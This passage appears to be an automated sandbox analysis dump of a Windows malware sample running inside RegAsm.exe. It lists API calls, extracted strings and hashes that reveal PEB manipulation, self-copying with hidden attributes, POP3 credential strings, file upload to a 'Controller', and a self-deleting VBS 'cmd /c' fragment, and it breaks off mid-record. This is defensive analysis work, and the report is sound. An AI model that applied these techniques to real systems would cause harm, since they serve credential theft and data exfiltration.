                                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 004072CA
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 004072CD
                                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 004072DE
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 004072E1
                                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 004072F2
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 004072F5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AddressHandleModuleProc
                                                                        • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                                        • API String ID: 1646373207-255920310
                                                                        • Opcode ID: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
                                                                        • Instruction ID: f839149ce94c73eee9bda0254407c114f4740b95dc73f4bc012c28e2a4ae17e7
                                                                        • Opcode Fuzzy Hash: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
                                                                        • Instruction Fuzzy Hash: 520171E0E4431676DB216F3A6C54D4B6F9C9E5125131A087BB409E2292FEBCE800CE6D
                                                                        APIs
                                                                        • _wcslen.LIBCMT ref: 0040CE07
                                                                        • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,@5U,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE20
                                                                        • CopyFileW.KERNEL32 ref: 0040CED0
                                                                        • _wcslen.LIBCMT ref: 0040CEE6
                                                                        • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CF6E
                                                                        • CopyFileW.KERNEL32 ref: 0040CF84
                                                                        • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFC3
                                                                        • _wcslen.LIBCMT ref: 0040CFC6
                                                                        • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFDD
                                                                        • CloseHandle.KERNEL32 ref: 0040D02D
                                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000001), ref: 0040D04B
                                                                        • ExitProcess.KERNEL32 ref: 0040D062
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                                        • String ID: 6$@5U$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$`2U$del$open
                                                                        • API String ID: 1579085052-3739255467
                                                                        • Opcode ID: 37bf41b36f569e96123a73dee1261e03dac0feab31b5a087a033d73400f0ce52
                                                                        • Instruction ID: 6918cae47ac4af68ec004dabb58255b0e3542cbe00f5913d2fcd66cab837b2ae
                                                                        • Opcode Fuzzy Hash: 37bf41b36f569e96123a73dee1261e03dac0feab31b5a087a033d73400f0ce52
                                                                        • Instruction Fuzzy Hash: CA51A620208302ABD605B7659C92A6F679D9F84719F10443FF609A62E3EFBC9D05866E
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free$EnvironmentVariable
                                                                        • String ID: 0;U
                                                                        • API String ID: 1464849758-4237915841
                                                                        • Opcode ID: 12b2d8700cfafab1c51f31b0af1c60b5a90c67e430b3d12670f3d9796c815c4a
                                                                        • Instruction ID: f75d98bba309171a1893162bbba9979c566f834f65d54a181aa040c21db392b6
                                                                        • Opcode Fuzzy Hash: 12b2d8700cfafab1c51f31b0af1c60b5a90c67e430b3d12670f3d9796c815c4a
                                                                        • Instruction Fuzzy Hash: C4D13672D007006BFB20AF799D81A6B77A4EF01318F05427FE919A7382EB3D99058799
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.621174878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 0000000E.00000002.621168505.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.621174878.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: _strlen
                                                                        • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                                        • API String ID: 4218353326-3023110444
                                                                        • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                        • Instruction ID: bb93a2ec4ecc4c0c7ac40ef0fbf5621e946fdf476ba73097d2750e43d9e064ca
                                                                        • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                        • Instruction Fuzzy Hash: 69612475D04218ABFF11CBE4C851BDEB7F9EF45280F00409AE604A7299EF706A45CF96
                                                                        APIs
                                                                        • lstrlenW.KERNEL32(?), ref: 0041C036
                                                                        • _memcmp.LIBVCRUNTIME ref: 0041C04E
                                                                        • lstrlenW.KERNEL32(?), ref: 0041C067
                                                                        • FindFirstVolumeW.KERNEL32 ref: 0041C0A2
                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C0B5
                                                                        • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C0F9
                                                                        • lstrcmpW.KERNEL32(?,?), ref: 0041C114
                                                                        • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C12C
                                                                        • _wcslen.LIBCMT ref: 0041C13B
                                                                        • FindVolumeClose.KERNEL32 ref: 0041C15B
                                                                        • GetLastError.KERNEL32 ref: 0041C173
                                                                        • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C1A0
                                                                        • lstrcatW.KERNEL32 ref: 0041C1B9
                                                                        • lstrcpyW.KERNEL32(?,?), ref: 0041C1C8
                                                                        • GetLastError.KERNEL32 ref: 0041C1D0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                                        • String ID: ?
                                                                        • API String ID: 3941738427-1684325040
                                                                        • Opcode ID: 8bb61c95002590c369f4a1d7d05134d86b2ad7932cc4dc2ebb1cdf4d201e776a
                                                                        • Instruction ID: a349862c8cee18361e8dc915c9858c0b302c9409c899df8dda18ff866c7f94c5
                                                                        • Opcode Fuzzy Hash: 8bb61c95002590c369f4a1d7d05134d86b2ad7932cc4dc2ebb1cdf4d201e776a
                                                                        • Instruction Fuzzy Hash: 8B416171584316EBD720DFA0DC889EB77ECAB49755F00092BF545C2261EB78C988CBDA
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.621174878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 0000000E.00000002.621168505.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.621174878.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: _strlen
                                                                        • String ID: %m$~$Gon~$~F@7$~dra
                                                                        • API String ID: 4218353326-230879103
                                                                        • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                        • Instruction ID: 2a57ee3bda34e0ca62253b4f9cdd28a92c7aa5ebcaa9e167bfd7dd38749d7a78
                                                                        • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                        • Instruction Fuzzy Hash: 9371F5B5D002685BEF11DBB49895BDF7BFCDB05280F104096E644D7246EB74EB85CBA0
                                                                        APIs
                                                                        • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C6B1
                                                                        • RegEnumKeyExA.ADVAPI32 ref: 0041C6F5
                                                                        • RegCloseKey.ADVAPI32(?), ref: 0041C9BF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseEnumOpen
                                                                        • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                                        • API String ID: 1332880857-3714951968
                                                                        • Opcode ID: 01bc9fe353fd2bad3d2e5d6b02442aa3bdaad2c57b214901d2918a8b4713c134
                                                                        • Instruction ID: af0903b0dab8fbea49832074ad132f154b97281cd99b968e1e8b6bf9777b958e
                                                                        • Opcode Fuzzy Hash: 01bc9fe353fd2bad3d2e5d6b02442aa3bdaad2c57b214901d2918a8b4713c134
                                                                        • Instruction Fuzzy Hash: 248144711083419BC325EF11D851EEFB7E8BF94309F10492FB589921A1FF78AE49CA5A
                                                                        APIs
                                                                        • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D5DA
                                                                        • GetCursorPos.USER32(?), ref: 0041D5E9
                                                                        • SetForegroundWindow.USER32(?), ref: 0041D5F2
                                                                        • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D60C
                                                                        • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D65D
                                                                        • ExitProcess.KERNEL32 ref: 0041D665
                                                                        • CreatePopupMenu.USER32 ref: 0041D66B
                                                                        • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D680
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                                        • String ID: Close
                                                                        • API String ID: 1657328048-3535843008
                                                                        • Opcode ID: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
                                                                        • Instruction ID: 483e3be36cf21f9f431d69439bfbb75804d706e25d1e382f075e68ac53faeb55
                                                                        • Opcode Fuzzy Hash: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
                                                                        • Instruction Fuzzy Hash: 392127B1944208FFDB194FA4ED0EAAA3B65FB08342F000135FA0A950B1D775EDA1EB5D
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free$Info
                                                                        • String ID:
                                                                        • API String ID: 2509303402-0
                                                                        • Opcode ID: c43f3e9ef6aa90fc617fbeb0adb34ec0a6d023508037e2c59db227b807854484
                                                                        • Instruction ID: 88ee944febda996c7adaaf7605242af7944d99fb061a5fd2e4f26fad8993db39
                                                                        • Opcode Fuzzy Hash: c43f3e9ef6aa90fc617fbeb0adb34ec0a6d023508037e2c59db227b807854484
                                                                        • Instruction Fuzzy Hash: 75B1CD719006059FEF20DF69C881BEEBBB4FF09304F14412EF5A8A7242D6799D45CB65
                                                                        APIs
                                                                        • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00408CE3
                                                                        • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D1B
                                                                        • __aulldiv.LIBCMT ref: 00408D4D
                                                                          • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                          • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                        • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408E70
                                                                        • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408E8B
                                                                        • CloseHandle.KERNEL32(00000000), ref: 00408F64
                                                                        • CloseHandle.KERNEL32(00000000), ref: 00408FAE
                                                                        • CloseHandle.KERNEL32(00000000), ref: 00408FFC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                                                        • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
                                                                        • API String ID: 3086580692-2582957567
                                                                        • Opcode ID: fab45d6a79c9ac0bf1655f247f025cadc321dba09b469fb01c23ef7c289d3ac7
                                                                        • Instruction ID: 4fd1ef8f0950b8c70c5ee12d710945c0a569e6ad21e20d2a74dcf75f3ec9a52d
                                                                        • Opcode Fuzzy Hash: fab45d6a79c9ac0bf1655f247f025cadc321dba09b469fb01c23ef7c289d3ac7
                                                                        • Instruction Fuzzy Hash: 95B193716083409BC314FB25C982AAFB7E5AFC4354F50492FF589622D2EF789945CB8B
                                                                        APIs
                                                                        • ___free_lconv_mon.LIBCMT ref: 0045130A
                                                                          • Part of subcall function 00450502: _free.LIBCMT ref: 0045051F
                                                                          • Part of subcall function 00450502: _free.LIBCMT ref: 00450531
                                                                          • Part of subcall function 00450502: _free.LIBCMT ref: 00450543
                                                                          • Part of subcall function 00450502: _free.LIBCMT ref: 00450555
                                                                          • Part of subcall function 00450502: _free.LIBCMT ref: 00450567
                                                                          • Part of subcall function 00450502: _free.LIBCMT ref: 00450579
                                                                          • Part of subcall function 00450502: _free.LIBCMT ref: 0045058B
                                                                          • Part of subcall function 00450502: _free.LIBCMT ref: 0045059D
                                                                          • Part of subcall function 00450502: _free.LIBCMT ref: 004505AF
                                                                          • Part of subcall function 00450502: _free.LIBCMT ref: 004505C1
                                                                          • Part of subcall function 00450502: _free.LIBCMT ref: 004505D3
                                                                          • Part of subcall function 00450502: _free.LIBCMT ref: 004505E5
                                                                          • Part of subcall function 00450502: _free.LIBCMT ref: 004505F7
                                                                        • _free.LIBCMT ref: 004512FF
                                                                          • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
                                                                          • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                                                        • _free.LIBCMT ref: 00451321
                                                                        • _free.LIBCMT ref: 00451336
                                                                        • _free.LIBCMT ref: 00451341
                                                                        • _free.LIBCMT ref: 00451363
                                                                        • _free.LIBCMT ref: 00451376
                                                                        • _free.LIBCMT ref: 00451384
                                                                        • _free.LIBCMT ref: 0045138F
                                                                        • _free.LIBCMT ref: 004513C7
                                                                        • _free.LIBCMT ref: 004513CE
                                                                        • _free.LIBCMT ref: 004513EB
                                                                        • _free.LIBCMT ref: 00451403
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                        • String ID:
                                                                        • API String ID: 161543041-0
                                                                        • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                                        • Instruction ID: 673b37a441ff9bbb7eb6cd98574e5fa8379d72fae64c09c4febd1ea684bb8cd8
                                                                        • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                                        • Instruction Fuzzy Hash: 0E319E315007009FFB20AA7AD845B5B73E8EF0131AF50851FEC68D7662DF78AD448B59
                                                                        APIs
                                                                        • ___free_lconv_mon.LIBCMT ref: 10007D06
                                                                          • Part of subcall function 100090BA: _free.LIBCMT ref: 100090D7
                                                                          • Part of subcall function 100090BA: _free.LIBCMT ref: 100090E9
                                                                          • Part of subcall function 100090BA: _free.LIBCMT ref: 100090FB
                                                                          • Part of subcall function 100090BA: _free.LIBCMT ref: 1000910D
                                                                          • Part of subcall function 100090BA: _free.LIBCMT ref: 1000911F
                                                                          • Part of subcall function 100090BA: _free.LIBCMT ref: 10009131
                                                                          • Part of subcall function 100090BA: _free.LIBCMT ref: 10009143
                                                                          • Part of subcall function 100090BA: _free.LIBCMT ref: 10009155
                                                                          • Part of subcall function 100090BA: _free.LIBCMT ref: 10009167
                                                                          • Part of subcall function 100090BA: _free.LIBCMT ref: 10009179
                                                                          • Part of subcall function 100090BA: _free.LIBCMT ref: 1000918B
                                                                          • Part of subcall function 100090BA: _free.LIBCMT ref: 1000919D
                                                                          • Part of subcall function 100090BA: _free.LIBCMT ref: 100091AF
                                                                        • _free.LIBCMT ref: 10007CFB
                                                                          • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                          • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                        • _free.LIBCMT ref: 10007D1D
                                                                        • _free.LIBCMT ref: 10007D32
                                                                        • _free.LIBCMT ref: 10007D3D
                                                                        • _free.LIBCMT ref: 10007D5F
                                                                        • _free.LIBCMT ref: 10007D72
                                                                        • _free.LIBCMT ref: 10007D80
                                                                        • _free.LIBCMT ref: 10007D8B
                                                                        • _free.LIBCMT ref: 10007DC3
                                                                        • _free.LIBCMT ref: 10007DCA
                                                                        • _free.LIBCMT ref: 10007DE7
                                                                        • _free.LIBCMT ref: 10007DFF
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.621174878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 0000000E.00000002.621168505.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.621174878.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                        • String ID:
                                                                        • API String ID: 161543041-0
                                                                        • Opcode ID: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                                        • Instruction ID: 6de9b84f5b51ee4e35cbeb1ed48e08772f21b212059d2ac72beb9c863e9ed859
                                                                        • Opcode Fuzzy Hash: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                                        • Instruction Fuzzy Hash: 90313931A04645EFFB21DA38E941B6A77FAFF002D1F11446AE84DDB159DE3ABC809B14
                                                                        APIs
                                                                        • Sleep.KERNEL32(00001388), ref: 0040A740
                                                                          • Part of subcall function 0040A675: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0040A6AB
                                                                          • Part of subcall function 0040A675: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
                                                                          • Part of subcall function 0040A675: Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
                                                                          • Part of subcall function 0040A675: CloseHandle.KERNEL32(00000000), ref: 0040A6EE
                                                                        • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A77C
                                                                        • GetFileAttributesW.KERNEL32(00000000), ref: 0040A78D
                                                                        • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7A4
                                                                        • PathFileExistsW.SHLWAPI(00000000), ref: 0040A81E
                                                                          • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C49E
                                                                        • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466468,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A927
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                                        • String ID: 8SG$8SG$@5U$pQG$pQG
                                                                        • API String ID: 3795512280-1227615734
                                                                        • Opcode ID: 9246c906b51f7ef76b321572192bfb08ffa2a7cb594671af2c3c76767c77d2b9
                                                                        • Instruction ID: 265ddfea45d140738b9a7e0f0353a6f5be26653907181caffe3561bb72ed66c0
                                                                        • Opcode Fuzzy Hash: 9246c906b51f7ef76b321572192bfb08ffa2a7cb594671af2c3c76767c77d2b9
                                                                        • Instruction Fuzzy Hash: A7517E716043055ACB09BB32C866ABE739A9F80349F00483FB642B71E2DF7C9D09865E
                                                                        APIs
                                                                          • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                                                                          • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                                                                          • Part of subcall function 004136F8: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 00413714
                                                                          • Part of subcall function 004136F8: RegQueryValueExA.KERNEL32 ref: 0041372D
                                                                          • Part of subcall function 004136F8: RegCloseKey.KERNEL32(00000000), ref: 00413738
                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D859
                                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D9B8
                                                                        • ExitProcess.KERNEL32 ref: 0040D9C4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                                        • String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                                        • API String ID: 1913171305-3159800282
                                                                        • Opcode ID: 260fab9fb5891a43e4fef7b59b37253bdbc83e54b4a4747c2b6c438f3c1e3980
                                                                        • Instruction ID: 6fc8d312854778a25908ca85050b1cee1951ef16e4956e50e312a563d71e527c
                                                                        • Opcode Fuzzy Hash: 260fab9fb5891a43e4fef7b59b37253bdbc83e54b4a4747c2b6c438f3c1e3980
                                                                        • Instruction Fuzzy Hash: 0C413A719001195ACB15FA62DC56DEEB778AF50309F10007FB10AB61E2EF785E4ACA98
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free
                                                                        • String ID:
                                                                        • API String ID: 269201875-0
                                                                        • Opcode ID: 47079874d6611f76b22abc1c1892e8562d414d23f3395fd45a7677fdf32a9ec5
                                                                        • Instruction ID: d910990a8472ee08c0279d8077499983e41ff25138a9859a729e4309013b5263
                                                                        • Opcode Fuzzy Hash: 47079874d6611f76b22abc1c1892e8562d414d23f3395fd45a7677fdf32a9ec5
                                                                        • Instruction Fuzzy Hash: E2C17476D40204AFEB20DBA9CC83FDE77B8AB19705F14015AFE05EB283D6B49D458798
                                                                        APIs
                                                                          • Part of subcall function 004558A9: CreateFileW.KERNEL32(00000000,00000000,?,00455C84,?,?,00000000), ref: 004558C6
                                                                        • GetLastError.KERNEL32 ref: 00455CEF
                                                                        • __dosmaperr.LIBCMT ref: 00455CF6
                                                                        • GetFileType.KERNEL32 ref: 00455D02
                                                                        • GetLastError.KERNEL32 ref: 00455D0C
                                                                        • __dosmaperr.LIBCMT ref: 00455D15
                                                                        • CloseHandle.KERNEL32(00000000), ref: 00455D35
                                                                        • CloseHandle.KERNEL32(?), ref: 00455E7F
                                                                        • GetLastError.KERNEL32 ref: 00455EB1
                                                                        • __dosmaperr.LIBCMT ref: 00455EB8
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                        • String ID: H
                                                                        • API String ID: 4237864984-2852464175
                                                                        • Opcode ID: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
